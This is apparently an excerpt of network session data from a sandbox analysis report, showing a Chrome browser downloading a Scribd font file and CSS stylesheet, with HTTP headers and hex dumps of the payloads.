                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 64 78 88 ef f7 1a 89 d7 92 c0 8e ea df f8 9a b9 cf 90 bc 2c 71 1c d9 bf 3d 08 a1 f8 a5 a5 80 b3 11 c2 70 d1 a7 5f e3 68 1e 10 94 7e 8f e9 62 be fe cd d5 a0 60 3c fb 12 ec 41 9b 62 77 6a 7a d4 8e c7 7d 75 ed 95 dd cb 71 1e 34 55 2b 75 d7 36 eb cc 84 f4 f0 60 c6 ee 7a 6f 27 36 46 ff d5 f7 fb ff a0 f8 12 e6 8e cc 34 3d ef 73 b5 1b 69 60 b7 7e 0f dd 69 1a 13 a0 81 e7 df 75 81 0f 7a d8 6c 16 fb 66 c5 d3 c5 e2 68 17 9e 32 a6 47 03 da 60 d7 a4 af f8 57 f9 2f ae ae a7 9d 51 ad 76 38 a3 02 89 36 a1 71 0c cd d8 13 41 1b 00 66 6d 56 38 16 0a b4 89 b6 5c db e7 6e 8f 75 00 13 d7 7c 3d 27 42 1d 96 22 0a a7 39 01 ae ad 8e d9 81 7a 13 c1 49 bb c9 d4 e7 bd cf 5d df a4 6c 2d 84 e3 bd b2 ff e2 23 94 f8 f2 17 3a 3c 98 2b b9 c9 33 ae 22 33 c4 13 1d 56 0f f7 0a 77 b7 3c f8 ee
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: dx,q=p_h~b`<Abwjz}uq4U+u6`zo'6F4=si`~iuzlfh2G`W/Qv86qAfmV8\nu|='B"9zI]l-#:<+3"3Vw<


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        3192.168.2.1649715151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC631OUTGET /webpack/assets/fonts/source_sans_pro/semibold/source_sans_pro_600.latin.76017e81.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC670INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 15860
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 14 Aug 2024 21:13:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "1349b98cfec56640cdfdc2e5c2730939"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2724368
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740051-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 19184
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522357.502564,VS0,VE0
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 77 4f 46 32 00 01 00 00 00 00 3d f4 00 11 00 00 00 00 9d 80 00 00 3d 95 00 02 05 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 46 1b b5 16 1c 86 20 06 60 00 90 00 08 2a 09 82 73 11 08 0a 81 d4 30 81 b9 68 01 36 02 24 03 89 10 0b 84 4a 00 04 20 05 84 5a 07 20 0c 56 1b c2 8c 35 ca b6 5d 34 08 74 07 e0 5c 3d 2d 05 29 1a 11 81 f3 40 f9 7d e1 24 8d 8a 9a c9 49 05 96 fd ff 27 24 a8 21 63 bf df 3c 00 5d 66 95 70 08 c5 48 88 31 4b 59 d5 74 b5 d0 59 8a 01 83 92 f3 da ca 54 23 f4 ba 83 7d c5 78 db 9e 2f 8b 70 a8 1c e9 77 d9 e2 d0 3d f9 5e 80 58 fb 7c 5c 17 c2 21 2c 47 c9 ef 8f 1e 33 92 30 84 70 60 98 78 01 8b fa 51 8a 9d e1 e2 89 d9 5b d8 64 92 31 14 e5 8a f1 3f d1 16 e1 da b3 ee 08 8d 7d 92 4b f2 fc f3 fd 19 fd da e7 a5 3a d5 76 52 6d 63 c6 21
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: wOF2==`F `*s0h6$J Z V5]4t\=-)@}$I'$!c<]fpH1KYtYT#}x/pw=^X|\!,G30p`xQ[d1?}K:vRmc!
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 89 2d 95 e9 90 23 0c 12 6a 01 20 c5 5e 2e 30 bc 70 23 45 08 40 8a d3 a0 36 5a 92 d6 8b 5a 37 35 15 dd d5 82 b8 b4 87 d1 ca 6e da 80 d9 ba 0b 8e eb 69 3a ff c8 be 44 36 ac 48 50 f3 72 21 cc b1 f3 fa c3 e6 12 3d 13 bb 2e 01 41 22 56 15 a6 bf d4 40 24 2b 9d 3d 5e 62 d1 c7 ca d2 42 69 84 24 dd 2f 04 e2 85 c5 8b 30 87 b2 b6 4a f4 e4 cd 46 7a 3d 8c dc 92 04 84 f6 8d a9 d3 00 c1 c7 6c 7e e2 bb 7e 07 53 3d 11 e8 ae cc 4a 64 15 6a a5 a2 f4 f8 d2 1b 63 db 08 c7 d0 49 0c d6 5c 1d aa 78 7a 71 1c 31 6c 7f e0 0d 4d 57 37 6d 75 e9 7b 35 b2 c8 75 d2 f2 aa 42 ed 4b d1 66 b8 38 f6 fa eb 0e 78 51 f5 9a dc ff 17 4c 42 2a 0c a5 f3 55 97 0b 8e 56 61 61 28 1c 3e 1e c4 42 28 5a 66 42 aa 80 cb 49 f4 d6 80 ee 3c 59 0b dc 2e b1 61 bf 31 ca e5 ee 4d 7f ed f9 34 f3 74 1f d0 2e 68 03
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -#j ^.0p#E@6ZZ75ni:D6HPr!=.A"V@$+=^bBi$/0JFz=l~~S=JdjcI\xzq1lMW7mu{5uBKf8xQLB*UVaa(>B(ZfBI<Y.a1M4t.h
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 30 a1 cd 6d 68 3f c9 47 17 e1 80 04 11 62 44 88 43 6b 70 41 e6 0a d1 bc f8 1b a9 ce 0d 4d c3 41 eb 92 d4 d4 7b b2 4f 84 59 04 6a 62 85 1a 78 3d 4c 40 82 a5 42 ac b5 73 27 0e 22 d7 c9 ea ce 41 ec b6 59 09 1c 74 f4 5f 25 84 90 d2 ce 66 c6 62 9b 50 32 4a 3a 6d 29 42 72 2a e1 63 ad fa cd 56 50 d3 33 ec 5b 57 59 0e 5b a7 47 ff db b9 0e c3 ee 41 3f b4 b8 30 1b 8e 76 ab cc 2d 83 d3 83 7c 78 5d 79 0d 5c 6c 02 04 de ee 20 09 12 83 72 c0 d3 11 1e 89 48 c9 06 99 16 2e a9 ab 0a fe 2e 6d 9a 77 31 72 f9 ed b1 44 22 67 9c 75 ce 79 17 5c 74 c9 65 57 5c 75 c3 4d d7 5c 0f 4a a6 ff 79 9f fd 0e 38 e8 90 c3 8e 38 ea 98 e3 4e 39 ed 84 93 30 ec 37 03 81 9b 2c 24 4c 49 7b 2d 43 9f 77 84 3c 1a bd 89 c8 20 3a e6 9a 04 de 3f e3 aa bc 69 84 29 7f fb ae a6 45 d8 3e a7 17 fe e4 39 11
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0mh?GbDCkpAMA{OYjbx=L@Bs'"AYt_%fbP2J:m)Br*cVP3[WY[GA?0v-|x]y\l rH..mw1rD"guy\teW\uM\Jy88N907,$LI{-Cw< :?i)E>9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: c9 57 2a 54 e4 07 9d e6 09 d8 3e b0 fd 6e 26 cf fe 65 56 13 db 90 86 d9 1d df 94 f9 e9 81 bf f3 fd cd d0 76 df 07 c8 e2 5d bb 42 26 dd 3c cf 52 a8 1d 84 0f 18 75 e9 8c b9 ca 04 44 a3 f9 de 55 65 01 f7 df 65 09 21 80 b4 5f 0a 90 79 01 b5 21 08 30 ed d5 60 e6 c9 01 c6 56 05 dd 25 60 81 11 40 21 20 18 da b4 c5 4e 6b 74 f2 12 07 ba ee 48 94 d9 86 83 af da 71 74 5e 44 95 c2 e3 14 9c 25 78 3c 88 85 9d 8f 97 38 11 01 14 09 5a 04 43 58 56 2c 27 72 6f 99 a5 b7 a1 09 6c ec 71 ae 25 d2 2e 28 0d 36 34 41 fa 43 ea 02 95 e3 f0 4e 5e 69 59 26 79 d2 a1 3c 4a cb ce 11 9a a2 05 eb f0 c2 c9 57 5a 2f 99 26 73 24 56 58 71 a8 aa e0 55 d8 07 fd 54 f5 ee d0 07 33 53 4b 73 4d 93 8c 2f c9 d5 8c 0a b2 fe 50 57 06 ab b3 ff 61 57 af b8 1f 93 91 a1 d7 a6 d6 de e6 ea a1 95 6c 50 ea 4a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: W*T>n&eVv]B&<RuDUee!_y!0`V%`@! NktHqt^D%x<8ZCXV,'rolq%.(64ACN^iY&y<JWZ/&s$VXqUT3SKsM/PWaWlPJ
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: a1 68 9e a6 7c fa 93 79 ee 4e 0e 68 02 89 38 60 1d d7 a8 71 1d e9 31 25 1a 99 88 fd ea a2 32 e6 72 f2 bc b6 4e e3 14 08 fc df e3 24 68 56 1c 6b a3 d1 24 1b c4 3e b8 7d 84 07 59 76 93 44 60 ed 30 a4 98 88 cd 91 1a 56 6b 6d dd 5e 52 8d 6a 2f c8 47 72 85 b4 b1 c5 19 c9 0c ea 56 0d a9 7d be 49 39 90 51 d6 93 71 ac f4 d5 24 fb ed b4 a4 e3 6d 90 e2 01 4a b5 85 1c 61 7e fc e9 fb 1e 2e 59 87 2b 67 fe 52 ac b0 fa 38 8f f1 3f 3d 67 de 53 ae ed c6 c4 c3 aa 9d 15 a3 95 d7 95 5a 7a 31 20 b4 d3 96 1c 8c e6 80 4a ef fd 78 ff 58 20 28 cb ee c6 70 01 a5 64 d3 d9 a2 d4 d7 d4 cf ff 33 b3 41 fe 62 ba 42 2c e2 2a ef 59 fc 83 5f 02 0a 59 ea 80 cd d8 4c 30 6f 72 b9 35 28 67 08 8d 5d 17 df 75 68 5b df bf 4c 64 74 ac 78 2c c4 5f da 88 67 b3 21 e3 29 e8 9d 84 c8 79 b4 40 a4 67 18
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h|yNh8`q1%2rN$hVk$>}YvD`0Vkm^Rj/GrV}I9Qq$mJa~.Y+gR8?=gSZz1 JxX (pd3AbB,*Y_YL0or5(g]uh[Ldtx,_g!)y@g
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: ab c9 07 d3 0c 1d 65 7c 99 a3 7b f3 9c b5 cb 57 d8 99 6d b6 ac 26 86 51 91 2f 2c a9 6a 1a 39 a2 ba b6 58 28 76 74 ff e6 4f 58 fb dc ff fc 28 e4 cf 70 74 ff ee 87 ef 1d f0 0f 44 ab 4b 40 55 03 2b 4b 7c 2e 5e 67 96 a7 81 a3 d4 15 26 be da ed 68 f2 11 2e 5b 07 b1 d1 1b 29 e9 2c c6 e0 7e 74 b5 fb 1e 42 83 6a d8 1b 83 81 b0 88 b0 40 aa 25 46 10 8d 4f 0f a0 9b 72 1b d4 16 48 1f 5b 93 85 7c 1c f7 a6 6e 77 e0 28 27 3e f3 ab 91 c0 5a d8 28 23 f8 29 7d ec 99 9f fd dd 63 b6 08 f3 03 87 4b d9 cf 1e e6 bf bd 52 e3 9b e5 9b 62 15 9b 81 cd 31 8a 4d 0d f2 09 dd d5 2c 38 45 e2 4c 00 44 73 ab 28 da 6a 8a 70 2e 90 a0 d1 51 e0 ac 7c 47 f7 f0 f3 f5 aa df 80 c4 21 01 29 a6 be 2e 5e 38 a4 51 8a cb b5 81 8a 4a ae d9 cb e8 b0 59 19 ed 66 57 25 47 a1 10 dd e2 ca ba d5 56 eb 16 af
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e|{Wm&Q/,j9X(vtOX(ptDK@U+K|.^g&h.[),~tBj@%FOrH[|nw('>Z(#)}cKRb1M,8ELDs(jp.Q|G!).^8QJYfW%GV
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: fd 81 e4 9f 4d 43 b4 c5 40 71 94 76 9c fc 67 a5 e2 e7 38 98 b6 19 28 06 b5 fe e4 9f 35 ed fd 53 93 1e 36 45 6a 5a 81 b2 48 6d 93 f4 ff dc a8 85 bf a6 f7 b7 4b f2 56 56 ad 04 c6 27 8f e7 e6 0d ef f9 b4 f0 6d 7b 4a e1 ce df 4f 00 ab 4c 6b 84 85 c6 ca b3 71 7d 7d 71 d9 45 e4 08 da c0 8e ee 23 0f 5b 9c af 37 c7 e9 56 00 63 63 74 63 8c af eb b7 0e e2 62 e5 c0 19 3d 31 fd 89 fd 52 6e 41 da 63 fb ab 3c 2d bd 36 b1 62 16 1f 68 e2 14 ab 16 eb ba 8e fa c3 d6 de f3 df 3b 1a ed 9f b8 fe 48 d6 ba f6 2c b0 44 2b 4d b7 5e d6 7a fb a1 a6 14 ba ce 72 7d 92 dc f6 40 9f 73 16 57 a7 49 db 79 9e ba a8 43 94 eb 7f a8 d6 2b c2 e4 3f 0b a2 f8 37 52 43 fa 26 9f d2 d1 6c 68 65 38 b2 b8 6d 76 3b 77 84 cb 36 82 6e 5a ed 0f 5d 7b d7 7f f7 e8 30 ff da 7c f2 35 72 69 53 cd c8 51 8d 8d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MC@qvg8(5S6EjZHmKVV'm{JOLkq}}qE#[7Vcctcb=1RnAc<-6bh;H,D+M^zr}@sWIyC+?7RC&lhe8mv;w6nZ]{0|5riSQ
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 8f 9a c2 3d 70 72 2f 15 8f f6 7c 0d c9 e1 cb 68 ca b8 67 1b 19 90 1f 5b f9 92 24 17 fc 37 58 40 82 1a 32 1f 1c b2 16 3b b2 b8 61 f6 cb 58 5e 99 e6 eb b6 42 de 04 d2 06 1a 0e e3 56 24 c7 67 f3 d9 c8 46 99 44 c0 9c 9f 0e 66 f9 e4 f8 5d c1 0d ad 41 0d 09 bb c0 89 1d d4 91 e2 f1 6d 8a 6d 73 a7 b2 a1 50 74 21 16 d2 44 16 4c 3a 91 50 35 22 2c 75 aa 17 15 b9 33 75 d2 2c e7 f8 e0 fa 9a e6 37 2d 00 fd a9 c7 1b 17 34 ce 3f 31 79 96 13 64 5c 75 0e 38 23 19 7f 59 a6 59 fe 75 5f 00 1b 9f 87 e5 13 90 c7 82 b8 58 0c 6f f0 71 24 f2 78 34 0f 83 e5 c6 1c 03 c1 09 da bb da 48 50 ac bb ab 43 3d 6d 7f 98 5e 96 fe e1 db 97 56 83 a8 19 22 14 0a 54 98 f5 6f 1f 6a 68 4d 8f bc b2 d5 ae d1 dc 99 38 51 a0 26 e8 f1 49 85 a2 9b f5 f5 80 38 0d d8 b4 f5 2d cc 65 6d d6 0c 66 cf cd 3b 21
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =pr/|hg[$7X@2;aX^BV$gFDf]AmmsPt!DL:P5",u3u,7-4?1yd\u8#YYu_Xoq$x4HPC=m^V"TojhM8Q&I8-emf;!
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: ff d8 df 0a e1 27 ed ff 83 4e ef de 3f 09 a7 22 e9 79 7c 03 89 64 e0 f3 f4 f0 4d 8b 30 c1 6a 25 0e a7 54 07 63 9e a3 f7 41 55 44 52 15 94 ee 07 89 58 05 b7 e7 f5 de 0f 45 10 88 88 d0 fb bd 6a ed cf e4 e4 9f 1a 6d ef 40 25 13 09 fa 40 6f fe d1 a8 af c3 60 0a ea 2b 12 59 9b 44 e2 4d 2c e6 21 b1 e8 10 fd 56 6d 49 5f 1e 15 2f cc 60 e9 09 0c c1 77 06 a1 ed b8 16 ba d0 c9 d3 59 f3 d4 60 99 ad e4 83 86 79 20 59 b5 37 99 cc f8 9b 86 6b 3d a2 85 2e d2 54 89 06 6b a1 29 b2 7c bc 50 ff 49 e6 96 82 31 a8 12 ad 0a 18 3a f2 18 92 83 d1 2b 8d 28 b6 34 93 71 fd 27 65 1e 96 27 11 22 97 94 2f 30 4d 25 25 70 16 6e 00 a2 fc b9 a7 e6 2d 4e 5d 9c 32 14 1a 3f 5f 30 5c 3e e7 0a 52 f9 2f 70 15 a5 bc 72 8a 0a 2c 10 4c 48 59 82 37 7f ea 92 79 d5 7a 90 6b c5 3d 67 79 e7 c9 93 c6 87
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 'N?"y|dM0j%TcAUDRXEjm@%@o`+YDM,!VmI_/`wY`y Y7k=.Tk)|PI1:+(4q'e'"/0M%%pn-N]2?_0\>R/pr,LHY7yzk=gy
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 36 a7 83 88 f9 ed ce d7 c7 88 da 78 e3 6c fe 10 b8 ef f3 6e 4b 58 da db 0e aa 25 a7 dd b5 14 58 18 71 fb 96 c0 6b 75 42 7a 63 35 06 f3 c0 a8 57 48 df c5 32 a4 2e 06 0d 66 0e 85 d6 c9 7a 5f e3 ae 05 2d 2a dc 04 8d 50 fc 84 82 81 30 28 b3 a0 ac 8c 05 93 62 09 19 84 8f 64 6c c1 48 21 0a 98 e6 b6 b5 d6 c5 fa 4f 14 b3 ed ca b6 00 5c 5c 03 ce 70 b3 75 77 63 7e 8e b8 8e d3 2a d7 01 ad 57 7b 9f 20 3c 45 e8 4d c7 a2 a9 0e 6b 8f aa 88 7d 3e 93 55 3d c8 43 fe 9b 59 c2 3c 91 de 8a fe 34 a9 75 d2 b8 3a b7 64 69 49 ea c8 2e 10 9b bf 7d f1 44 d9 b2 c7 32 26 cf c1 ba ad 62 aa ec da 01 03 e6 cc 92 2d 33 79 bc 0c dd 57 0d 17 5e 39 c2 46 b0 de ef c6 0f fd 2c 1d cd e4 7f 39 b3 6e 25 3f 93 e3 e2 c4 fd 5f 06 b9 ec d7 18 22 44 11 7e 94 df 67 79 11 75 16 3c 8a e2 04 c6 d0 3f 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6xlnKX%XqkuBzc5WH2.fz_-*P0(bdlH!O\\puwc~*W{ <EMk}>U=CY<4u:diI.}D2&b-3yW^9F,9n%?_"D~gyu<?:


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        4192.168.2.1649717151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC577OUTGET /webpack/monolith/105.02924deb17e63c446344.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC572INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 56702
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:32:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "dda2756451e9368c94e464ff967136a1"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 8511
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740035-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522357.502788,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 2d 62 72 69 63 6b 2d 31 30 30 3a 23 66 31 65 33 65 33 3b 2d 2d 63 6f 6c 6f 72 2d 62 72 69 63 6b 2d 32 30 30 3a 23 63 66 62 63 62 63 3b 2d 2d 63 6f 6c 6f 72 2d 75 6d 62 65 72 2d 31 30 30 3a 23 66 34 65 61 64 62 3b 2d 2d 63 6f 6c 6f 72 2d 75 6d 62 65 72 2d 32 30 30 3a 23 65 34 64 37 62 66 3b 2d 2d 63 6f 6c 6f 72 2d 66 6c 61 78 2d 31 30 30 3a 23 66 36 66 34 65 33 3b 2d 2d 63 6f 6c 6f 72 2d 66 6c 61 78 2d 32 30 30 3a 23 65 39 65 35 63 36 3b 2d 2d 63 6f 6c 6f 72 2d 6a 61 64 65 2d 31 30 30 3a 23 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */:root{--color-brick-100:#f1e3e3;--color-brick-200:#cfbcbc;--color-umber-100:#f4eadb;--color-umber-200:#e4d7bf;--color-flax-100:#f6f4e3;--color-flax-200:#e9e5c6;--color-jade-100:#e
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 61 6e 67 6f 2d 38 30 3a 23 66 33 61 66 38 30 3b 2d 2d 63 6f 6c 6f 72 2d 6d 61 6e 67 6f 2d 39 30 3a 23 63 62 37 62 34 34 3b 2d 2d 63 6f 6c 6f 72 2d 6d 61 6e 67 6f 2d 31 30 30 3a 23 36 35 34 37 31 39 3b 2d 2d 63 6f 6c 6f 72 2d 73 6c 61 74 65 2d 31 30 30 3a 23 35 39 36 32 38 30 3b 2d 2d 63 6f 6c 6f 72 2d 73 6c 61 74 65 2d 32 30 30 3a 23 34 63 35 34 37 33 3b 2d 2d 63 6f 6c 6f 72 2d 73 6c 61 74 65 2d 33 30 30 3a 23 34 33 34 61 36 37 3b 2d 2d 63 6f 6c 6f 72 2d 73 6c 61 74 65 2d 34 30 30 3a 23 33 30 33 31 34 30 3b 2d 2d 63 6f 6c 6f 72 2d 73 6c 61 74 65 2d 35 30 30 3a 23 31 36 31 37 31 62 3b 2d 2d 63 6f 6c 6f 72 2d 73 6e 6f 77 2d 31 30 30 3a 23 66 39 66 61 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 73 6e 6f 77 2d 32 30 30 3a 23 66 30 66 32 66 39 3b 2d 2d 63 6f 6c 6f 72 2d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ango-80:#f3af80;--color-mango-90:#cb7b44;--color-mango-100:#654719;--color-slate-100:#596280;--color-slate-200:#4c5473;--color-slate-300:#434a67;--color-slate-400:#303140;--color-slate-500:#16171b;--color-snow-100:#f9faff;--color-snow-200:#f0f2f9;--color-
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 64 65 34 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 6f 72 63 68 69 64 2d 31 30 30 3a 23 34 61 33 38 35 63 3b 2d 2d 63 6f 6c 6f 72 2d 63 6f 62 61 6c 74 2d 39 30 3a 23 65 34 65 64 66 63 3b 2d 2d 63 6f 6c 6f 72 2d 63 6f 62 61 6c 74 2d 31 30 30 3a 23 33 36 33 65 35 34 3b 2d 2d 63 6f 6c 6f 72 2d 63 65 64 61 72 2d 39 30 3a 23 66 66 66 34 65 64 3b 2d 2d 63 6f 6c 6f 72 2d 63 65 64 61 72 2d 31 30 30 3a 23 35 31 34 32 32 62 3b 2d 2d 63 6f 6c 6f 72 2d 62 6c 61 63 6b 2d 31 30 30 3a 23 30 30 30 3b 2d 2d 63 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 2d 31 30 30 3a 23 38 32 38 32 38 32 3b 2d 2d 63 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 2d 32 30 30 3a 23 36 34 36 34 36 34 3b 2d 2d 63 6f 6c 6f 72 2d 77 68 69 74 65 2d 31 30 30 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 2d 67 72 65 65 6e 2d 31 30
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: de4ff;--color-orchid-100:#4a385c;--color-cobalt-90:#e4edfc;--color-cobalt-100:#363e54;--color-cedar-90:#fff4ed;--color-cedar-100:#51422b;--color-black-100:#000;--color-neutral-100:#828282;--color-neutral-200:#646464;--color-white-100:#fff;--color-green-10
